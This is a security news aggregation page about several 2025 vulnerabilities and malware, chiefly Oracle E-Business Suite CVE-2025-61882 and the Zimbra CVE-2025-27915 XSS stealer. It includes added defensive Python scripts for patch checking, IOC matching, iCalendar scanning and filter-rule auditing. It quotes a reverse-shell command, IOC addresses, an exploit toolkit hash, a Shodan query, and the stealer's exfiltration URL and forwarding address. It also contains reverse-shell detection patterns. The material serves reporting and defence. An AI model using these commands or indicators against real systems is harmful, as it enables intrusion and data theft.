SpyCloud Labs analysts have successfully reverse-engineered Asgard Protector, a sophisticated crypter tool prominently used to hide malicious payloads from antivirus detection systems. This crypter has gained particular notoriety for being the preferred choice among sellers of LummaC2, currently the most prevalent commodity infostealer in the cyberthreat landscape. The analysis reveals intricate evasion techniques that demonstrate the evolving […]
QNAP Systems has disclosed a critical security vulnerability in its NetBak Replicator software that could enable local attackers to execute malicious code on affected systems. The vulnerability, tracked as CVE-2025-57714, stems from an unquoted search path element flaw that poses significant security risks to organizations using the backup solution. Vulnerability Details and Impact Assessment The […]
A critical zero-day vulnerability in Oracle E-Business Suite has emerged as a significant threat to enterprise environments, with proof-of-concept (PoC) exploit code now publicly available.
CVE-2025-61882 presents a severe security risk, achieving a maximum CVSS 3.1 score of 9.8 and enabling remote code execution without authentication across multiple Oracle E-Business Suite versions.
The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14, specifically targeting the Oracle Concurrent Processing BI Publisher Integration component via the HTTP protocol.
Oracle E-Business Suite RCE Vulnerability
Security researchers have identified a flaw that allows unauthenticated remote attackers to execute arbitrary code on vulnerable systems through network-based exploitation with low attack complexity.
Oracle’s security advisory emphasizes the vulnerability’s classification as “remotely exploitable without authentication,” meaning attackers can leverage network access without requiring valid credentials.
The vulnerability’s attack vector utilizes HTTP communications, with the scope remaining unchanged but delivering high impact across confidentiality, integrity, and availability metrics.
Organizations can detect vulnerable instances using Nuclei detection templates that check for “E-Business Suite Home Page” text while comparing Last-Modified header timestamps against October 4, 2025.
The Oracle October 2023 Critical Patch Update serves as a prerequisite for applying the necessary security patches. Systems with modification dates preceding this threshold indicate unpatched installations susceptible to exploitation.
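The check described above, as an added example that is neither part of the original article nor a Nuclei template: it classifies a response from a suspected Oracle E-Business Suite login page using the two signals the article names, the "E-Business Suite Home Page" marker in the body and a Last-Modified header earlier than 4 October 2025. The function names, the fetch helper and the sample responses are assumptions made for this illustration.

```python
"""Added example (not from the original article and not a Nuclei template):
classify an HTTP response from a suspected Oracle E-Business Suite login page
with the two signals the article describes: the "E-Business Suite Home Page"
marker in the body and a Last-Modified header earlier than 4 October 2025.
The function names, the fetch helper and the sample responses are assumptions
made for this illustration."""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from urllib.request import Request, urlopen

HOME_PAGE_MARKER = "E-Business Suite Home Page"
# The article's cut-off: builds modified before this date are treated as unpatched.
PATCH_THRESHOLD = datetime(2025, 10, 4, tzinfo=timezone.utc)


def classify_ebs_response(body: str, headers: dict) -> str:
    """Return 'not-ebs', 'likely-unpatched' or 'patched-or-unknown'.

    A missing or unparsable Last-Modified header yields 'patched-or-unknown'
    rather than a vulnerable verdict, so the check favours fewer false positives.
    """
    if HOME_PAGE_MARKER not in body:
        return "not-ebs"
    # HTTP header names are case-insensitive; normalise before looking up.
    last_modified = next(
        (v for k, v in headers.items() if k.lower() == "last-modified"), None
    )
    if not last_modified:
        return "patched-or-unknown"
    try:
        modified = parsedate_to_datetime(last_modified)
    except (TypeError, ValueError):   # older Pythons raise TypeError on bad input
        return "patched-or-unknown"
    if modified.tzinfo is None:       # "-0000" dates come back naive; assume UTC
        modified = modified.replace(tzinfo=timezone.utc)
    return "likely-unpatched" if modified < PATCH_THRESHOLD else "patched-or-unknown"


def fetch_and_classify(url: str, timeout: float = 10.0) -> str:
    """Fetch the page at `url` (the caller supplies the full login-page URL)
    and classify it. Needs network access, so it is not exercised offline."""
    req = Request(url, headers={"User-Agent": "ebs-patch-check/1.0"})
    with urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
        return classify_ebs_response(body, dict(resp.headers.items()))


# Constructed sample responses for offline use; not captured from any real host.
SAMPLE_UNPATCHED = (
    "<html><title>E-Business Suite Home Page</title></html>",
    {"Last-Modified": "Wed, 01 Oct 2025 08:15:00 GMT"},
)
SAMPLE_PATCHED = (
    "<html><title>E-Business Suite Home Page</title></html>",
    {"last-modified": "Mon, 06 Oct 2025 12:00:00 GMT"},
)
SAMPLE_OTHER = (
    "<html><title>Welcome</title></html>",
    {"Last-Modified": "Wed, 01 Oct 2025 08:15:00 GMT"},
)

if __name__ == "__main__":
    for name, (body, hdrs) in [("unpatched", SAMPLE_UNPATCHED),
                               ("patched", SAMPLE_PATCHED),
                               ("other", SAMPLE_OTHER)]:
        print(f"{name}: {classify_ebs_response(body, hdrs)}")
```

The Last-Modified comparison is only a proxy for patch level: a reverse proxy or CDN may rewrite the header, so a "likely-unpatched" result should be confirmed against the instance's actual patch inventory before it is reported.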
Risk Factors            Details
Affected Products       Oracle E-Business Suite 12.2.3-12.2.14
Impact                  Remote Code Execution
Exploit Prerequisites   Network access via HTTP protocol, no authentication required
CVSS 3.1 Score          9.8 (Critical)
Active Exploitation
Active exploitation attempts have been documented through specific Indicators of Compromise (IOCs), including the malicious IP addresses 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11, which were observed issuing GET and POST requests.
Threat actors are utilizing reverse shell commands such as sh -c /bin/bash -i >& /dev/tcp// 0>&1 to establish outbound TCP connections for persistent access.
Forensic analysis reveals malicious artifacts including the exploitation toolkit oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) containing Python exploitation scripts exp.py and server.py.
These tools demonstrate sophisticated attack methodologies potentially linked to known threat groups, including references to Scattered Spider, Lapsus$, and Cl0p ransomware operations.
Oracle strongly recommends the immediate deployment of patches across all affected E-Business Suite installations, emphasizing that only systems under Premier Support or Extended Support receive security updates.
Organizations should implement network monitoring for the identified IOCs while conducting comprehensive vulnerability assessments using available detection templates and Shodan queries targeting html:"OA_HTML" patterns to identify exposed instances.
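The IOC monitoring recommended above, as an added example that is not part of the original article: it applies the article's indicators to two constructed data sources, web-server access-log lines and process command lines. The two IP addresses are the ones the article lists; the Apache combined log format, the sample lines, the /dev/tcp heuristic and all function names are assumptions made for this illustration.

```python
"""Added example, not part of the original article: apply the article's
indicators to two constructed data sources, web-server access-log lines and
process command lines. The two IP addresses are the ones the article lists;
the Apache combined log format, the sample lines, the /dev/tcp heuristic and
all function names are assumptions made for this illustration."""
import ipaddress
import re

# Indicators from the article, written without the defanging brackets.
IOC_IPS = {
    ipaddress.ip_address("200.107.207.26"),
    ipaddress.ip_address("185.181.60.11"),
}

# Apache "combined" access-log layout (assumed; adapt to the server's format).
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Bash's /dev/tcp/<host>/<port> pseudo-device combined with an fd redirect or
# an interactive shell is the idiom quoted in the article; legitimate command
# lines almost never reference it. Host and port are allowed to be empty so
# the article's elided form (/dev/tcp//) is matched as well.
DEV_TCP_RE = re.compile(r'/dev/tcp/[^/\s]*/\d*')
REDIRECT_RE = re.compile(r'(>&|&>|<&|\d>&\d)')


def parse_access_line(line: str):
    """Return the parsed fields of one access-log line, or None if it
    does not match the expected layout."""
    m = ACCESS_LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(lines):
    """Return (line_no, ip, method, path) for every request from an IOC IP."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_access_line(line)
        if rec is None:
            continue
        try:
            ip = ipaddress.ip_address(rec["ip"])
        except ValueError:
            continue                      # hostname instead of IP; not comparable
        if ip in IOC_IPS:
            hits.append((n, str(ip), rec["method"], rec["path"]))
    return hits


def is_reverse_shell(cmdline: str) -> bool:
    """Heuristic: a /dev/tcp reference plus an fd redirect or an interactive
    shell flag. Tune against your own baseline before alerting on it."""
    if not DEV_TCP_RE.search(cmdline):
        return False
    return bool(REDIRECT_RE.search(cmdline)) or " -i" in cmdline


# Constructed sample data; IPs other than the IOCs are documentation ranges.
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [05/Oct/2025:10:11:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120',
    '200.107.207.26 - - [05/Oct/2025:10:12:31 +0000] "GET /OA_HTML/ HTTP/1.1" 200 1234',
    '185.181.60.11 - - [05/Oct/2025:10:12:40 +0000] "POST /OA_HTML/ HTTP/1.1" 302 0',
    'not a log line',
]
SAMPLE_CMDLINES = [
    "sh -c /bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",   # article's pattern, TEST-NET host
    "bash -c 'tar czf /tmp/backup.tgz /var/www'",
    "cat /dev/tcp_stats",
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("IOC hit:", hit)
    for cmd in SAMPLE_CMDLINES:
        print(f"{is_reverse_shell(cmd)!s:5} {cmd}")
```

Matching on source IP catches only the infrastructure already reported; the process-command-line check is the more durable of the two, since it keys on the technique rather than on an address the actor can change.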
Red team researchers have unveiled XRayC2, a sophisticated command-and-control framework that weaponizes Amazon Web Services’ X-Ray distributed application tracing service to establish covert communication channels. This innovative technique demonstrates how attackers can abuse legitimate cloud monitoring infrastructure to bypass traditional network security controls. […]
A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military.
Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient sanitization of HTML content in ICS calendar files,
The cybersecurity landscape continues to evolve as threat actors behind the WARMCOOKIE backdoor malware have significantly enhanced their capabilities, introducing new features and maintaining active development despite law enforcement disruptions. The latest WARMCOOKIE variants demonstrate the threat actors’ commitment to expanding their operational toolkit. Four new command handlers have been integrated into the malware’s architecture […]
Oracle has issued an urgent security alert for a critical zero-day vulnerability affecting Oracle E-Business Suite that allows remote code execution without authentication. The vulnerability, tracked as CVE-2025-61882, has now received public proof-of-concept detection capabilities from cybersecurity researcher rxerium. […]
A proof-of-concept exploit has been released for CVE-2025-32463, a critical local privilege escalation vulnerability affecting the Sudo binary that allows attackers to gain root access on Linux systems. The flaw was discovered by security researcher Rich Mirch and has garnered significant attention from the cybersecurity community. Critical Vulnerability in Sudo Binary CVE-2025-32463 represents a serious […]
Oracle has released an emergency update to address a critical security flaw in its E-Business Suite that it said has been exploited in the recent wave of Cl0p data theft attacks.
The vulnerability, tracked as CVE-2025-61882 (CVSS score: 9.8), concerns an unspecified bug that could allow an unauthenticated attacker with network access via HTTP to compromise and take control of the Oracle
A zero-day vulnerability in the Zimbra Collaboration Suite (ZCS) was actively exploited in targeted attacks earlier in 2025.
The flaw, identified as CVE-2025-27915, is a stored cross-site scripting (XSS) vulnerability that attackers leveraged by sending weaponized iCalendar (.ICS) files to steal sensitive data from victims’ email accounts.
The attacks were first identified by StrikeReady, which began monitoring for unusually large iCalendar files that contained JavaScript.
One notable attack targeted Brazil’s military, where an attacker, using an IP address of 193.29.58.37, spoofed the Libyan Navy’s Office of Protocol to deliver the then-unknown exploit.
The core of the issue lies within Zimbra’s Classic Web Client, which failed to properly sanitize HTML content within iCalendar files. This allowed threat actors to embed malicious JavaScript inside a .ICS attachment.
When a user opened an email containing the malicious calendar entry, the script would execute within the user’s active session.
This XSS vulnerability, often considered less severe than remote code execution (RCE) flaws, proved highly effective.
It enabled attackers to run arbitrary code to perform unauthorized actions, including data exfiltration and session hijacking, without the user’s knowledge.
Zimbra addressed the vulnerability on January 27, 2025, by releasing patches (versions 9.0.0 P44, 10.0.13, and 10.1.5), though evidence shows the exploit was used before the fix was available.
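The detection approach described above (watching for unusually large iCalendar files that contain JavaScript), as an added example that is neither part of the original article nor StrikeReady's tooling: a mail-gateway style scanner that unfolds an .ICS file per RFC 5545 and flags script-like markup inside property values. The size threshold, the patterns, the function names and the constructed sample files are assumptions made for this illustration.

```python
"""Added example, not part of the original article and not StrikeReady's
tooling: a mail-gateway style check for iCalendar attachments that carry
script-like markup, built on the two signals the article attributes to the
detection (unusually large .ICS files, and JavaScript inside them). The size
threshold, the patterns, the function names and the constructed sample files
are assumptions made for this illustration."""
import re

SIZE_THRESHOLD_BYTES = 64 * 1024          # assumed; ordinary invites are a few KB

# Markup that has no place inside a calendar property value. Plain HTML such as
# <p> or <b> in an X-ALT-DESC;FMTTYPE=text/html body is deliberately not flagged.
SCRIPT_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),        # inline handlers such as onload=
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
]


def unfold_ics(text: str) -> list:
    """RFC 5545 unfolding: a line that starts with a space or tab continues
    the previous line. Scanning raw lines instead would miss a tag that has
    been split across a fold."""
    lines = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def unescape_ics_text(value: str) -> str:
    # Undo RFC 5545 TEXT escaping: backslash-n, backslash-N, \, \; and \\
    return (value.replace("\\n", "\n").replace("\\N", "\n")
                 .replace("\\,", ",").replace("\\;", ";").replace("\\\\", "\\"))


def scan_ics(data: bytes) -> dict:
    """Return {'oversized': bool, 'markup_in': [property names], 'suspicious': bool}."""
    findings = {"oversized": len(data) > SIZE_THRESHOLD_BYTES, "markup_in": []}
    for line in unfold_ics(data.decode("utf-8", errors="replace")):
        name, sep, value = line.partition(":")
        if not sep:
            continue
        prop = name.split(";", 1)[0].upper()   # drop parameters such as ;FMTTYPE=text/html
        value = unescape_ics_text(value)
        if any(p.search(value) for p in SCRIPT_PATTERNS):
            findings["markup_in"].append(prop)
    findings["suspicious"] = findings["oversized"] or bool(findings["markup_in"])
    return findings


# Constructed samples; neither is a real invite or a real exploit file.
BENIGN_ICS = (
    b"BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\nUID:constructed-1\r\n"
    b"SUMMARY:Team sync\r\nDESCRIPTION:Agenda:\\n- status\\n- planning\r\n"
    b"X-ALT-DESC;FMTTYPE=text/html:<p>Agenda: status and planning</p>\r\n"
    b"END:VEVENT\r\nEND:VCALENDAR\r\n"
)
# The <script> tag is split across a folded line, so a naive grep of raw lines
# would not see it; the tag body is a comment placeholder, not real code.
SUSPICIOUS_ICS = (
    b"BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\nUID:constructed-2\r\n"
    b"SUMMARY:Meeting invitation\r\n"
    b"DESCRIPTION:Please review the attached schedule <scr\r\n"
    b" ipt>/* constructed placeholder */</script>\r\n"
    b"END:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    print("benign:", scan_ics(BENIGN_ICS))
    print("suspicious:", scan_ics(SUSPICIOUS_ICS))
```

Unfolding before matching is the point of the example: RFC 5545 lets a producer break any long line at 75 octets, so a tag split across a fold is a legal file that a line-oriented signature misses. The patterns are a starting point; a real gateway would also decode HTML entities and quoted-printable bodies before applying them.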
A Comprehensive Data-Stealing Payload
The JavaScript payload delivered through the exploit is a sophisticated data stealer designed specifically for Zimbra webmail. Its capabilities include:
Credential Theft: It creates hidden form fields to capture usernames and passwords from login pages.
Data Exfiltration: The script is programmed to steal a wide array of information, including emails, contacts, distribution lists, shared folders, scratch codes, and trusted device information. The stolen data is sent to an attacker-controlled server at https://ffrk.net/apache2_config_default_51_2_1.
Activity Monitoring: It monitors user activity and, if a user is inactive, triggers data theft before logging them out.
Email Forwarding: The malware adds a malicious email filter rule named “Correo” to automatically forward the victim’s emails to an external address, spam_to_junk@proton.me.
Evasion Techniques: To avoid detection, the script employs a 60-second delay before execution, limits its execution to once every three days, and hides user interface elements to conceal its activity.
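The forwarding rule described in the list above is the artifact most likely to survive after the session ends, so an audit of mailbox filter rules is a practical hunting step. As an added example that is not part of the original article: a script that lists every redirect action in a user's filter rules and reports those whose target domain is not an internal one. It assumes the rules are available as Sieve text in the layout Zimbra uses (a "# <rule name>" comment line followed by the rule's if-block); the sample script, the internal-domain list and the function names are constructed for this illustration.

```python
"""Added example, not part of the original article: audit a mailbox's filter
rules for forwarding to addresses outside the organisation, the kind of rule
the article says the payload created ("Correo", forwarding mail to an external
mailbox). It assumes the rules are available as Sieve text in the layout Zimbra
uses, a "# <rule name>" comment line followed by the rule's if-block; the sample
script, the internal-domain list and the function names are constructed for
this illustration."""
import re

# One rule = a "# name" comment line followed by everything up to the next one.
RULE_RE = re.compile(
    r'^#[ \t]*(?P<name>[^\n]+?)[ \t]*\n(?P<body>.*?)(?=^#|\Z)', re.M | re.S
)
# A redirect action, with any options (e.g. :copy) before the quoted address.
REDIRECT_RE = re.compile(r'\bredirect\b[^";]*"(?P<addr>[^"]+)"')


def list_redirects(sieve_text: str):
    """Return (rule_name, address) for every redirect action in the script."""
    out = []
    for rule in RULE_RE.finditer(sieve_text):
        for r in REDIRECT_RE.finditer(rule.group("body")):
            out.append((rule.group("name"), r.group("addr")))
    return out


def external_redirects(sieve_text: str, internal_domains):
    """Return only the redirects whose target domain is not an internal one.
    An address without an @ cannot be classified and is reported as external."""
    internal = {d.lower() for d in internal_domains}
    return [
        (name, addr) for name, addr in list_redirects(sieve_text)
        if "@" not in addr or addr.rsplit("@", 1)[1].lower() not in internal
    ]


# Constructed sample script for a mailbox at example.org. The "Correo" rule name
# and its target address mirror what the article reports; the rule body is made up.
SAMPLE_SIEVE = """require ["fileinto"];

# Archive newsletters
if anyof (header :contains ["from"] "news@example.org") {
    fileinto "Newsletters";
    stop;
}

# Correo
if true {
    redirect "spam_to_junk@proton.me";
}

# Board copy
if anyof (header :contains ["to"] "board@example.org") {
    redirect "archive@example.org";
}
"""

if __name__ == "__main__":
    for name, addr in external_redirects(SAMPLE_SIEVE, ["example.org"]):
        print(f"external forward in rule {name!r} -> {addr}")
```

Run across all mailboxes, the output is a short list that an analyst can review by hand; the specific rule name and address the article reports can be added as exact-match indicators on top of the generic external-domain check.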
While direct attribution remains unconfirmed, researchers note the tactics are similar to those used by a prolific Russian-linked threat actor and the group UNC1151, which has been linked to the Belarusian government.
This incident underscores the significant threat posed by XSS vulnerabilities in enterprise environments and the importance of applying security patches promptly.